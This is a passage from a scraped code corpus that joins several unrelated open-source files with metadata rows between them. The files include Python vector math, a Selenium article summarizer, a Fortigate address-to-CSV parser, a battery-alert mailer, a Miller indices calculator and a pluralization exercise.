d.set_filename("certs/"+str(idxn)) [d] = d.certs_by_type("type").keys() return d def add_cert_seed(self, idxn, seed): d = FileCertifications() d.set_filename("certs/"+str(idxn)) # clumsy usage of a dictionary as an unordered list. argh. return d.add("seeds", seed, None) def add_cert_level(self, idxn, level, index): d = FileCertifications() d.set_filename("certs/"+str(idxn)) # clumsy usage of a dictionary as an index-ordered list. argh. return d.add("levels", index, level) def set_cert_level_default(self, idxn, dflt_level): d = FileCertifications() d.set_filename("certs/"+str(idxn)) return d.add("default level", dflt_level, None) def set_cert_level_min(self, idxn, min_level): d = FileCertifications() d.set_filename("certs/"+str(idxn)) return d.add("min level", min_level, None) def set_cert_tmetric_type(self, idxn, type): d = FileCertifications() d.set_filename("certs/"+str(idxn)) return d.add("type", type, None) def test(): from profile import Profiles from tm_calc import PymTrustMetric from pprint import pprint f = FileCertInfo() f.add_cert_seed('like', '55') f.add_cert_seed('like', 'luke') f.add_cert_level('like', 'none', 0) f.add_cert_level('like', "don't care", 1) f.add_cert_level('like', 'good', 2) f.add_cert_level('like', 'best', 3) f.set_cert_level_default('like', "don't care") f.set_cert_level_min('like', 'none') f.set_cert_tmetric_type('like', 'to') f.add_cert_seed('hate', 'heather') f.add_cert_seed('hate', '10') f.add_cert_level('hate', 'none', 0) f.add_cert_level('hate', "don't care", 1) f.add_cert_level('hate', 'dislike', 2) f.add_cert_level('hate', 'looks CAN kill', 3) f.set_cert_level_default('hate', "don't care") f.set_cert_level_min('hate', 'none') f.set_cert_tmetric_type('hate', 'to') p = Profiles(FileProfile, FileCertifications) r = p.add_profile('luke') r.add("name", 0, "luke") r.add("name", 1, "kenneth") r.add("name", 2, "casson") r.add("name", 3, "leighton") r.add("info", 0, "likes python a lot - thinks it's really cool") r.add("info", 1, "groks network traffic like he has a built-in headsocket") p.add_profile('heather') p.add_profile('bob') p.add_profile('mary') p.add_profile('lesser fleas') p.add_profile('little fleas') p.add_profile('fleas') p.add_profile('robbie the old crock pony') p.add_profile('tart the flat-faced persian cat') p.add_profile('mo the mad orange pony') p.add_profile('55') p.add_profile('10') p.add_profile('2') p.add_profile('fleas ad infinitum') p.add_cert('luke', 'like', 'heather', 'best') p.add_cert('heather', 'like', 'luke', 'best') p.add_cert('heather', 'like', 'robbie the old crock pony', 'best') p.add_cert('heather', 'like', 'tart the flat-faced persian cat', 'best') p.add_cert('heather', 'like', 'mo the mad orange pony', 'best' ) p.add_cert('bob', 'like', 'mary', 'good') p.add_cert('bob', 'like', 'heather', 'good') p.add_cert('mary', 'like', 'bob', 'good') p.add_cert('fleas', 'like', 'little fleas', 'good') p.add_cert('little fleas', 'like', 'lesser fleas', 'best') p.add_cert('lesser fleas', 'like', 'fleas ad infinitum', 'best') p.add_cert('robbie the old crock pony', 'like', 'fleas', 'best') p.add_cert('55', 'like', '10', 'none') p.add_cert('10', 'like', '2', 'best') p.add_cert('heather', 'hate', 'bob', 'dislike' ) p.add_cert('heather', 'hate', 'fleas', 'looks CAN kill' ) p.add_cert('fleas', 'hate', 'mary', 'dislike') p.add_cert('10', 'hate', '55', 'looks CAN kill') t = PymTrustMetric(f, p) r = t.tmetric_calc('like') pprint(r) r = t.tmetric_calc('like', ['heather']) pprint(r) r = t.tmetric_calc('hate') pprint(r) if __name__ == '__main__': test()
gpl-2.0
-2,231,080,821,749,822,500
27.943452
77
0.668072
false
2.744074
false
false
false
natduca/ndbg
util/vec2.py
1
3522
# Copyright 2011 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import math class vec2(object): def __init__(self, opt_a=None,opt_b=None): if opt_a != None and opt_b != None: self.x = float(opt_a) self.y = float(opt_b) elif opt_a != None: self.x = float(opt_a.x) self.y = float(opt_a.y) else: self.x = 0 self.y = 0 def set(self,a,opt_b=None): if opt_b != None: self.x = float(a) self.y = float(opt_b) else: self.x = float(a.x) self.y = float(a.y) def __str__(self): return "(%f,%f)" % (self.x,self.y) def vec2_add(a,b): dst = vec2() dst.x = a.x + b.x dst.y = a.y + b.y return dst def vec2_accum(a,b): a.x += b.x a.y += b.y return a def vec2_sub(a,b): dst = vec2() dst.x = a.x - b.x dst.y = a.y - b.y return dst def vec2_neg_accum(a,b): a.x -= b.x a.y -= b.y return a def vec2_scale(a,scale): dst = vec2() dst.x = a.x * scale dst.y = a.y * scale return dst def vec2_scale_inplace(a,scale): a.x *= scale a.y *= scale return a def vec2_piecewise_mul(a,b): dst = vec2() dst.x = a.x * b.x dst.y = a.y * b.y return dst def vec2_piecewise_div(a,b): dst = vec2() dst.x = a.x / b.x dst.y = a.y / b.y return dst def vec2_dot(a,b): return a.x * b.x + a.y * b.y def vec2_length(a): return math.sqrt(vec2_dot(a,a)) def vec2_length_sqared(a): return vec2_dot(a,a) def vec2_normalize(a): s = 1/vec2_length(a) return vec2_scale(a,s) def vec2_normalize_inplace(dst): s = 1/vec2_length(dst) dst.x *= s dst.y *= s return dst def vec2_interp(a,b,factor): delta = vec2_sub(b,a) vec2_scale_inplace(delta,factor) vec2_accum(delta,a) return delta def vec2_distance(a,b): return vec2_length(vec2_sub(b,a)) class rect(object): def __init__(self,opt_a=None,opt_b=None,centered=False): if opt_a and opt_b: self.pos = vec2(opt_a) self.size = vec2(opt_b) elif opt_a == None and opt_b == None: self.pos = vec2(0,0) self.size = vec2(0,0) else: raise Exception("Need two args or none") if centered: hsize = vec2_scale(self.size,0.5) self.pos = vec2_sub(self.pos,hsize) def contains(self,v): return v.x >= self.pos.x and v.x < self.pos.x + self.size.x and v.y >= self.pos.y and v.y < self.pos.y + self.size.y ########################################################################### class ivec2(object): def __init__(self, opt_a=None,opt_b=None): if opt_a != None and opt_b != None: self.x = int(opt_a) self.y = int(opt_b) elif opt_a != None: self.x = int(opt_a.x) self.y = int(opt_a.y) else: self.x = 0 self.y = 0 def set(self,a,opt_b=None): if opt_b != None: self.x = int(a) self.y = int(opt_b) else: self.x = int(a.x) self.y = int(a.y) def __str__(self): return "(%i,%i)" % (self.x,self.y)
apache-2.0
5,074,446,273,003,439,000
20.47561
121
0.561045
false
2.676292
false
false
false
KT26/PythonCourse
8. Class/8.py
1
1268
# Created by PyCharm Pro Edition # User: Kaushik Talukdar # Date: 24-04-17 # Time: 12:29 AM # INHERITANCE # We can create a new class, but instead of writing it from scratch, we can base it on an existing class. # Lets understand inheritance better with an example class Car(): def __init__(self, make, model, year): self.make = make self.model = model self.year = year self.mileage = 0 def get_descriptive_name(self): full_name = self.make.title() + ' ' + self.model.title() + ' ' + str(self.year) return full_name def update_odometer(self, mileage): self.mileage = mileage # the class below is an inherited class derived from Cars and have access to Car's variables as well as methods # The parent class name must appear in parenthesis in child class for Inheritance to work # the super() method is responsible for providing the child class with all the variables and methods of parent class class ElectricCar(Car): def __init__(self, make, model, year): super().__init__(make, model, year) my_car = ElectricCar('Tesla', 'Model S', '2017') car = my_car.get_descriptive_name() print(car)
mit
-6,550,018,117,725,046,000
31.368421
116
0.630126
false
3.612536
false
false
false
Faeriol/news-summarizer
summarizer.py
1
3274
import os from goose3 import Goose from selenium import webdriver from selenium.common.exceptions import UnexpectedAlertPresentException, SessionNotCreatedException, WebDriverException from sumy.parsers.plaintext import PlaintextParser from sumy.nlp.tokenizers import Tokenizer from sumy.summarizers.lsa import LsaSummarizer as Summarizer from sumy.nlp.stemmers import Stemmer from sumy.utils import get_stop_words os.environ['MOZ_HEADLESS'] = '1' # Should be moved out LANGUAGE = "english" # Should be config option class NotEnoughContent(Exception): def __init__(self, url: str) -> None: super().__init__("Not enough content for: {}".format(url)) class InvalidContent(Exception): def __init__(self, url: str) -> None: super().__init__("Content appears invalid for: {}".format(url)) class BrowserSummarizer(object): def __init__(self, language: str, sentence_count: int) -> None: self.language = language self.sentence_count = sentence_count self.browser = None self.goose = Goose({"enable_image_fetching": False}) self.stemmer = Stemmer(language) self.tokenizer = Tokenizer(language) self.summarizer = Summarizer(self.stemmer) self.summarizer.stop_words = get_stop_words(language) def init(self) -> None: if self.browser: self.done() self.browser = webdriver.Firefox() def __enter__(self): self.init() return self def __exit__(self, *args): self.done() def _blank(self): """ Empty browser, do not kill instance """ try: self.browser.get("about:blank") except UnexpectedAlertPresentException: self.browser.switch_to.alert() self.browser.switch_to.alert().dismiss() def parse_url(self, url: str) -> (str, str): """ Parse retrieve the given url and parse it. :param url: The URL to parse :return: The resolved URL, the parsed content """ try: self.browser.get(url) except UnexpectedAlertPresentException: self.browser.switch_to.alert() self.browser.switch_to.alert().dismiss() self.browser.get(url) except WebDriverException: raise InvalidContent(url) try: # Move around any alerts self.browser.switch_to.alert() self.browser.switch_to.alert().dismiss() except Exception: pass try: contents = self.goose.extract(raw_html=self.browser.page_source) cleaned_url = self.browser.current_url except IndexError: raise InvalidContent(url) finally: self._blank() parser = PlaintextParser.from_string(contents.cleaned_text, self.tokenizer) sentences = self.summarizer(parser.document, self.sentence_count) if len(sentences) < self.sentence_count: raise NotEnoughContent(url) return cleaned_url, " ".join(str(sentence) for sentence in sentences) def done(self) -> None: self.browser.close() try: self.browser.quit() except SessionNotCreatedException: pass self.browser = None
mit
-2,505,183,108,841,201,700
32.408163
118
0.626145
false
4.082294
false
false
false
corerd/PyDomo
powerman/pwrmonitor.py
1
6768
#!/usr/bin/env python # # The MIT License (MIT) # # Copyright (c) 2019 Corrado Ubezio # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. from __future__ import print_function import logging import json import inspect from sys import stderr from time import strftime from datetime import datetime from os.path import dirname, join from apiclient import errors from traceback import format_exc from powerman.upower import UPowerManager from cloud.upload import upload_datastore from cloud.googleapis.gmailapi import gmSend from cloud.cloudcfg import ConfigDataLoad, checkDatastore # Globals VERSION = '1.0' VERSION_DATE = '2019' # Claud configuration file get from cloud package DEFAULT_CFG_FILE = 'cloudcfg.json' DEFAULT_CFG_FILE_PATH = join(dirname(inspect.getfile(ConfigDataLoad)), DEFAULT_CFG_FILE) # Power supply type IDs PSU_UNKNOWN = -1 PSU_AC = 0 PSU_BATTERY = 1 # Power supply type string description PSU_AC_DESC = "AC_ADAPTER" PSU_BATTERY_DESC = "BATTERY" # Files keeping power supply state LOG_FILE = 'pwrmonitor-log.txt' PSU_TYPE_FILE = 'pwrmonitor.json' DEFAULT_PSU_CFG = \ { 'power-supply': 'UNKNOWN' } USAGE = '''Check power supply type and if it is switched to battery then send an email alert message from the user's Gmail account. Data are logged in CSV format: datetime;city;temperature Email address of the receiver and datastore path are taken from a configuration file in JSON format. If none is given, the configuration is read from the file: %s ''' % DEFAULT_CFG_FILE_PATH def print_error(msg): print('%s;%s' % (strftime("%Y-%m-%d %H:%M:%S"), msg), file=stderr) def psu_type_getFromCfg(cfg_data): """Get the power supply type from configuration data Args: cfg_data: PSU configuration data Returns: PSU_UNKNOWN PSU_AC PSU_BATTERY """ psu_type_desc = cfg_data['power-supply'] if psu_type_desc == PSU_BATTERY_DESC: return PSU_BATTERY elif psu_type_desc == PSU_AC_DESC: return PSU_AC return PSU_UNKNOWN def psu_type_getFromDevice(): """Get the power supply type from UPowerManager Returns: PSU_AC PSU_BATTERY """ pwrMan = UPowerManager() # Get the Devices List searching for a battery battery_device = None for dev in pwrMan.detect_devices(): if 'battery' in dev: battery_device = dev break if not battery_device: # no battery device found: # power supply is external return PSU_AC if 'discharg' in pwrMan.get_state(battery_device).lower(): # The battery power allowd states: # "Unknown" # "Loading" (that is Charging) # "Discharging" # "Empty" # "Fully charged" # "Pending charge" # "Pending discharge" return PSU_BATTERY return PSU_AC def alert_send(to, message_text): """Send an alert email message from the user's account to the email address get from the configuration file. Args: to: Email address of the receiver. message_text: The text of the alert message. Returns: Success. """ subject = 'PSU Alert at ' + datetime.now().strftime("%d-%m-%Y %H:%M:%S") success = -1 try: gmSend(to, subject, message_text) except errors.HttpError as e: logging.error('HttpError occurred: %s' % e) except Exception: logging.error(format_exc()) else: logging.info(message_text) success = 0 return success def main(): print('pwrmonitor v%s - (C) %s' % (VERSION, VERSION_DATE)) # get the configuration data try: cloud_cfg = ConfigDataLoad(DEFAULT_CFG_FILE_PATH) except Exception as e: print_error('cloud configuration: unable to load %s' % DEFAULT_CFG_FILE_PATH) print_error('cloud configuration exception: %s' % type(e).__name__) print_error('cloud configuration: %s' % str(e)) return -1 try: log_file = join(cloud_cfg.data['datastore'], LOG_FILE) except KeyError: print_error("Keyword 'datastore' not found in file %s" % DEFAULT_CFG_FILE_PATH) return -1 try: receiver_address = cloud_cfg.data['alert-receiver-address'] except KeyError: print_error("Keyword 'alert-receiver-address' not found in file %s" % DEFAULT_CFG_FILE_PATH) return -1 # logger setup if checkDatastore(log_file) is not True: print_error("Cannot access %s directory" % cloud_cfg.data['datastore']) return -1 logging.basicConfig(filename=log_file, format='%(asctime)s;%(levelname)s;%(message)s', level=logging.DEBUG) # check PSU type psu_switch2battery = 0 psu_cfg_file = join(cloud_cfg.data['datastore'], PSU_TYPE_FILE) psu_cfg = ConfigDataLoad(psu_cfg_file, DEFAULT_PSU_CFG) psu_type_prev = psu_type_getFromCfg(psu_cfg.data) psu_type_current = psu_type_getFromDevice() if psu_type_current != psu_type_prev: if psu_type_current == PSU_BATTERY: psu_type_desc = PSU_BATTERY_DESC else: psu_type_desc = PSU_AC_DESC logging.info('power supply switched to {}'.format(psu_type_desc)) psu_cfg.data['power-supply'] = psu_type_desc psu_cfg.update() if psu_type_current == PSU_BATTERY: psu_switch2battery = 1 logging.debug('send alert') alert_send(receiver_address, 'AC power adapter has been unplugged.') upload_datastore(cloud_cfg.data['datastore']) return psu_switch2battery if __name__ == "__main__": exit(main())
mit
-1,850,814,616,450,463,200
30.18894
85
0.655585
false
3.644588
true
false
false
jolyonb/edx-platform
common/lib/chem/chem/miller.py
1
9303
""" Calculation of Miller indices """ from __future__ import absolute_import import decimal import fractions as fr import json import math import numpy as np from six.moves import map from six.moves import range from functools import reduce def lcm(a, b): """ Returns least common multiple of a, b Args: a, b: floats Returns: float """ return a * b / fr.gcd(a, b) def segment_to_fraction(distance): """ Converts lengths of which the plane cuts the axes to fraction. Tries convert distance to closest nicest fraction with denominator less or equal than 10. It is purely for simplicity and clearance of learning purposes. Jenny: 'In typical courses students usually do not encounter indices any higher than 6'. If distance is not a number (numpy nan), it means that plane is parallel to axis or contains it. Inverted fraction to nan (nan is 1/0) = 0 / 1 is returned Generally (special cases): a) if distance is smaller than some constant, i.g. 0.01011, than fraction's denominator usually much greater than 10. b) Also, if student will set point on 0.66 -> 1/3, so it is 333 plane, But if he will slightly move the mouse and click on 0.65 -> it will be (16,15,16) plane. That's why we are doing adjustments for points coordinates, to the closest tick, tick + tick / 2 value. And now UI sends to server only values multiple to 0.05 (half of tick). Same rounding is implemented for unittests. But if one will want to calculate miller indices with exact coordinates and with nice fractions (which produce small Miller indices), he may want shift to new origin if segments are like S = (0.015, > 0.05, >0.05) - close to zero in one coordinate. He may update S to (0, >0.05, >0.05) and shift origin. In this way he can receive nice small fractions. Also there is can be degenerated case when S = (0.015, 0.012, >0.05) - if update S to (0, 0, >0.05) - it is a line. This case should be considered separately. Small nice Miller numbers and possibility to create very small segments can not be implemented at same time). Args: distance: float distance that plane cuts on axis, it must not be 0. Distance is multiple of 0.05. Returns: Inverted fraction. 0 / 1 if distance is nan """ if np.isnan(distance): return fr.Fraction(0, 1) else: fract = fr.Fraction(distance).limit_denominator(10) return fr.Fraction(fract.denominator, fract.numerator) def sub_miller(segments): ''' Calculates Miller indices from segments. Algorithm: 1. Obtain inverted fraction from segments 2. Find common denominator of inverted fractions 3. Lead fractions to common denominator and throws denominator away. 4. Return obtained values. Args: List of 3 floats, meaning distances that plane cuts on x, y, z axes. Any float not equals zero, it means that plane does not intersect origin, i. e. shift of origin has already been done. Returns: String that represents Miller indices, e.g: (-6,3,-6) or (2,2,2) ''' fracts = [segment_to_fraction(segment) for segment in segments] common_denominator = reduce(lcm, [fract.denominator for fract in fracts]) miller_indices = ([ fract.numerator * math.fabs(common_denominator) / fract.denominator for fract in fracts ]) return'(' + ','.join(map(str, list(map(decimal.Decimal, miller_indices)))) + ')' def miller(points): """ Calculates Miller indices from points. Algorithm: 1. Calculate normal vector to a plane that goes trough all points. 2. Set origin. 3. Create Cartesian coordinate system (Ccs). 4. Find the lengths of segments of which the plane cuts the axes. Equation of a line for axes: Origin + (Coordinate_vector - Origin) * parameter. 5. If plane goes trough Origin: a) Find new random origin: find unit cube vertex, not crossed by a plane. b) Repeat 2-4. c) Fix signs of segments after Origin shift. This means to consider original directions of axes. I.g.: Origin was 0,0,0 and became new_origin. If new_origin has same Y coordinate as Origin, then segment does not change its sign. But if new_origin has another Y coordinate than origin (was 0, became 1), than segment has to change its sign (it now lies on negative side of Y axis). New Origin 0 value of X or Y or Z coordinate means that segment does not change sign, 1 value -> does change. So new sign is (1 - 2 * new_origin): 0 -> 1, 1 -> -1 6. Run function that calculates miller indices from segments. Args: List of points. Each point is list of float coordinates. Order of coordinates in point's list: x, y, z. Points are different! Returns: String that represents Miller indices, e.g: (-6,3,-6) or (2,2,2) """ N = np.cross(points[1] - points[0], points[2] - points[0]) O = np.array([0, 0, 0]) P = points[0] # point of plane Ccs = list(map(np.array, [[1.0, 0, 0], [0, 1.0, 0], [0, 0, 1.0]])) segments = ([ np.dot(P - O, N) / np.dot(ort, N) if np.dot(ort, N) != 0 else np.nan for ort in Ccs ]) if any(x == 0 for x in segments): # Plane goes through origin. vertices = [ # top: np.array([1.0, 1.0, 1.0]), np.array([0.0, 0.0, 1.0]), np.array([1.0, 0.0, 1.0]), np.array([0.0, 1.0, 1.0]), # bottom, except 0,0,0: np.array([1.0, 0.0, 0.0]), np.array([0.0, 1.0, 0.0]), np.array([1.0, 1.0, 1.0]), ] for vertex in vertices: if np.dot(vertex - O, N) != 0: # vertex not in plane new_origin = vertex break # obtain new axes with center in new origin X = np.array([1 - new_origin[0], new_origin[1], new_origin[2]]) Y = np.array([new_origin[0], 1 - new_origin[1], new_origin[2]]) Z = np.array([new_origin[0], new_origin[1], 1 - new_origin[2]]) new_Ccs = [X - new_origin, Y - new_origin, Z - new_origin] segments = ([np.dot(P - new_origin, N) / np.dot(ort, N) if np.dot(ort, N) != 0 else np.nan for ort in new_Ccs]) # fix signs of indices: 0 -> 1, 1 -> -1 ( segments = (1 - 2 * new_origin) * segments return sub_miller(segments) def grade(user_input, correct_answer): ''' Grade crystallography problem. Returns true if lattices are the same and Miller indices are same or minus same. E.g. (2,2,2) = (2, 2, 2) or (-2, -2, -2). Because sign depends only on student's selection of origin. Args: user_input, correct_answer: json. Format: user_input: {"lattice":"sc","points":[["0.77","0.00","1.00"], ["0.78","1.00","0.00"],["0.00","1.00","0.72"]]} correct_answer: {'miller': '(00-1)', 'lattice': 'bcc'} "lattice" is one of: "", "sc", "bcc", "fcc" Returns: True or false. ''' def negative(m): """ Change sign of Miller indices. Args: m: string with meaning of Miller indices. E.g.: (-6,3,-6) -> (6, -3, 6) Returns: String with changed signs. """ output = '' i = 1 while i in range(1, len(m) - 1): if m[i] in (',', ' '): output += m[i] elif m[i] not in ('-', '0'): output += '-' + m[i] elif m[i] == '0': output += m[i] else: i += 1 output += m[i] i += 1 return '(' + output + ')' def round0_25(point): """ Rounds point coordinates to closest 0.5 value. Args: point: list of float coordinates. Order of coordinates: x, y, z. Returns: list of coordinates rounded to closes 0.5 value """ rounded_points = [] for coord in point: base = math.floor(coord * 10) fractional_part = (coord * 10 - base) aliquot0_25 = math.floor(fractional_part / 0.25) if aliquot0_25 == 0.0: rounded_points.append(base / 10) if aliquot0_25 in (1.0, 2.0): rounded_points.append(base / 10 + 0.05) if aliquot0_25 == 3.0: rounded_points.append(base / 10 + 0.1) return rounded_points user_answer = json.loads(user_input) if user_answer['lattice'] != correct_answer['lattice']: return False points = [list(map(float, p)) for p in user_answer['points']] if len(points) < 3: return False # round point to closes 0.05 value points = [round0_25(point) for point in points] points = [np.array(point) for point in points] # print miller(points), (correct_answer['miller'].replace(' ', ''), # negative(correct_answer['miller']).replace(' ', '')) if miller(points) in (correct_answer['miller'].replace(' ', ''), negative(correct_answer['miller']).replace(' ', '')): return True return False
agpl-3.0
2,638,268,032,322,332,000
32.584838
122
0.5868
false
3.622664
false
false
false
maaaaz/fgpoliciestocsv
fgaddressestocsv.py
1
6306
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # This file is part of fgpoliciestocsv. # # Copyright (C) 2014, 2020, Thomas Debize <tdebize at mail.com> # All rights reserved. # # fgpoliciestocsv is free software: you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # fgpoliciestocsv is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public License # along with fgpoliciestocsv. If not, see <http://www.gnu.org/licenses/>. from __future__ import absolute_import from __future__ import division from __future__ import print_function from os import path import io import sys import re import csv import os # OptionParser imports from optparse import OptionParser from optparse import OptionGroup # Options definition parser = OptionParser(usage="%prog [options]") main_grp = OptionGroup(parser, 'Main parameters') main_grp.add_option('-i', '--input-file', help='Partial or full Fortigate configuration file. Ex: fgfw.cfg') main_grp.add_option('-o', '--output-file', help='Output csv file (default ./addresses-out.csv)', default=path.abspath(path.join(os.getcwd(), './addresses-out.csv'))) main_grp.add_option('-s', '--skip-header', help='Do not print the csv header', action='store_true', default=False) main_grp.add_option('-n', '--newline', help='Insert a newline between each group for better readability', action='store_true', default=False) main_grp.add_option('-d', '--delimiter', help='CSV delimiter (default ";")', default=';') main_grp.add_option('-e', '--encoding', help='Input file encoding (default "utf8")', default='utf8') parser.option_groups.extend([main_grp]) # Python 2 and 3 compatibility if (sys.version_info < (3, 0)): fd_read_options = 'r' fd_write_options = 'wb' else: fd_read_options = 'r' fd_write_options = 'w' # Handful patterns # -- Entering address definition block p_entering_address_block = re.compile(r'^\s*config firewall address$', re.IGNORECASE) # -- Exiting address definition block p_exiting_address_block = re.compile(r'^end$', re.IGNORECASE) # -- Commiting the current address definition and going to the next one p_address_next = re.compile(r'^next$', re.IGNORECASE) # -- Policy number p_address_name = re.compile(r'^\s*edit\s+"(?P<address_name>.*)"$', re.IGNORECASE) # -- Policy setting p_address_set = re.compile(r'^\s*set\s+(?P<address_key>\S+)\s+(?P<address_value>.*)$', re.IGNORECASE) # Functions def parse(options): """ Parse the data according to several regexes @param options: options @rtype: return a list of addresses ( [ {'id' : '1', 'srcintf' : 'internal', ...}, {'id' : '2', 'srcintf' : 'external', ...}, ... ] ) and the list of unique seen keys ['id', 'srcintf', 'dstintf', ...] """ global p_entering_address_block, p_exiting_address_block, p_address_next, p_address_name, p_address_set in_address_block = False address_list = [] address_elem = {} order_keys = [] with io.open(options.input_file, mode=fd_read_options, encoding=options.encoding) as fd_input: for line in fd_input: line = line.strip() # We match a address block if p_entering_address_block.search(line): in_address_block = True # We are in a address block if in_address_block: if p_address_name.search(line): address_name = p_address_name.search(line).group('address_name') address_elem['name'] = address_name if not('name' in order_keys): order_keys.append('name') # We match a setting if p_address_set.search(line): address_key = p_address_set.search(line).group('address_key') if not(address_key in order_keys): order_keys.append(address_key) address_value = p_address_set.search(line).group('address_value').strip() address_value = re.sub('["]', '', address_value) address_elem[address_key] = address_value # We are done with the current address id if p_address_next.search(line): address_list.append(address_elem) address_elem = {} # We are exiting the address block if p_exiting_address_block.search(line): in_address_block = False return (address_list, order_keys) def generate_csv(results, keys, options): """ Generate a plain csv file """ if results and keys: with io.open(options.output_file, mode=fd_write_options) as fd_output: spamwriter = csv.writer(fd_output, delimiter=options.delimiter, quoting=csv.QUOTE_ALL, lineterminator='\n') if not(options.skip_header): spamwriter.writerow(keys) for address in results: output_line = [] for key in keys: if key in address.keys(): output_line.append(address[key]) else: output_line.append('') spamwriter.writerow(output_line) if options.newline: spamwriter.writerow('') fd_output.close() return None def main(): """ Dat main """ global parser options, arguments = parser.parse_args() if (options.input_file == None): parser.error('Please specify a valid input file') results, keys = parse(options) generate_csv(results, keys, options) return None if __name__ == "__main__" : main()
gpl-3.0
7,071,415,867,654,911,000
35.04
165
0.595465
false
3.956085
false
false
false
s5brown/MLfeatures
assignment_1_Sebastian_Brown.py
1
3964
"""Assignment 1.""" from assignment_1_eval import pairs vowels = ['a', 'e', 'i', 'o', 'u'] es_sounds = ['ch', 's', 'z'] no_change = [ 'economics', 'mathematics', 'statistics', 'luggage', 'baggage', 'furniture', 'information', 'gymnastics', 'news'] always_singular = ['fish', 'barracks', 'deer', 'sheep'] def pluralize(sg): """Return list of plural form(s) of input_word. Building this function is the purpose of Assignment 1. The most basic case is already provided. """ # print('Enter word to be made plural: ') plurals = [] if sg in no_change: plurals.append('') elif sg in always_singular: plurals.append(sg) elif sg == 'tooth': plurals.append('teeth') elif sg == 'goose': plurals.append('geese') elif sg == 'child': plurals.append('children') elif sg == 'foot': plurals.append('feet') elif sg == 'man': plurals.append('men') elif sg == 'woman': plurals.append('women') elif sg == 'person': plurals.append('people') elif sg == 'mouse': plurals.append('mice') elif sg == 'corpus': plurals.append(sg.replace(sg[-2:], 'ora')) elif sg == 'genus': plurals.append(sg.replace(sg[-2:], 'era')) elif sg.endswith('a'): plurals.append(sg + 'e') plurals.append(sg + 's') elif sg == 'crisis': plurals.append('crises') elif sg.endswith('us'): plurals.append(sg.replace(sg[-2:], 'i')) plurals.append(sg + 'es') elif sg.endswith('ex'): plurals.append(sg.replace(sg[-2:], 'ices')) plurals.append(sg + 'es') elif sg.endswith('x'): plurals.append(sg.replace(sg[-1], 'ces')) plurals.append(sg + 'es') elif sg.endswith('um'): plurals.append(sg.replace(sg[-2:], 'a')) plurals.append(sg + 's') elif sg.endswith('on'): plurals.append(sg.replace(sg[-2:], 'a')) elif sg.endswith('is'): plurals.append(sg.replace(sg[-2:], 'es')) elif sg.endswith('oo'): plurals.append(sg + 's') elif sg.endswith('o') and sg != 'auto': plurals.append(sg + 'es') plurals.append(sg + 's') elif sg.endswith('y') and sg[-2] in vowels: plurals.append(sg + 's') elif sg.endswith('y'): plurals.append(sg.replace(sg[-1], 'ies')) # NOTE I had to add parentheses to the following two lines to make the interpreter keep reading the next line. elif (sg.endswith(es_sounds[0]) or sg.endswith(es_sounds[1]) or sg.endswith(es_sounds[2])): plurals.append(sg + 'es') elif sg.endswith('f'): plurals.append(sg.replace(sg[-1], 'ves')) elif sg.endswith('fe'): plurals.append(sg.replace(sg[-2:], 'ves')) else: plurals.append(sg + 's') return plurals def singularize(sg): """Return list of plural form(s) of input_word. Building this function is the purpose of Assignment 1. The most basic case is already provided. """ # print("Enter word to be made singular: ") plurals = [] return plurals def evaluate(pl_func=pluralize, pair_data=pairs): """Evaluate the performance of pluralize function based on pairs data. pl_func -- function that pluralizes input word (default=pluralize) pair_data -- list of 2-tuples: [(sg1, pl1), (sg2, pl2),...] (default=pairs) """ total = len(pair_data) # Determine how many lexemes have more than one plural form. # duplicates = len(set([i for i, j in pair_data])) correct = 0 for sg, pl in pair_data: predicted_pl = pl_func(sg) if pl == predicted_pl or pl in predicted_pl: correct += 1 print('correct:', sg, predicted_pl, '({})'.format(pl), sep='\t') else: print('INcorrect:', sg, predicted_pl, '({})'.format(pl), sep='\t') print('Your score:', correct, '/', total, '{:.2%}'.format(correct / total)) evaluate()
gpl-3.0
-5,668,059,858,905,396,000
31.760331
114
0.573411
false
3.222764
false
false
false
qtproject/pyside-pyside
tests/QtQml/registertype.py
1
3725
############################################################################# ## ## Copyright (C) 2016 The Qt Company Ltd. ## Contact: https://www.qt.io/licensing/ ## ## This file is part of the test suite of PySide2. ## ## $QT_BEGIN_LICENSE:GPL-EXCEPT$ ## Commercial License Usage ## Licensees holding valid commercial Qt licenses may use this file in ## accordance with the commercial license agreement provided with the ## Software or, alternatively, in accordance with the terms contained in ## a written agreement between you and The Qt Company. For licensing terms ## and conditions see https://www.qt.io/terms-conditions. For further ## information use the contact form at https://www.qt.io/contact-us. ## ## GNU General Public License Usage ## Alternatively, this file may be used under the terms of the GNU ## General Public License version 3 as published by the Free Software ## Foundation with exceptions as appearing in the file LICENSE.GPL3-EXCEPT ## included in the packaging of this file. Please review the following ## information to ensure the GNU General Public License requirements will ## be met: https://www.gnu.org/licenses/gpl-3.0.html. ## ## $QT_END_LICENSE$ ## ############################################################################# import sys import unittest import helper from PySide2.QtCore import Property, QTimer, QUrl from PySide2.QtGui import QGuiApplication, QPen, QColor, QPainter from PySide2.QtQml import 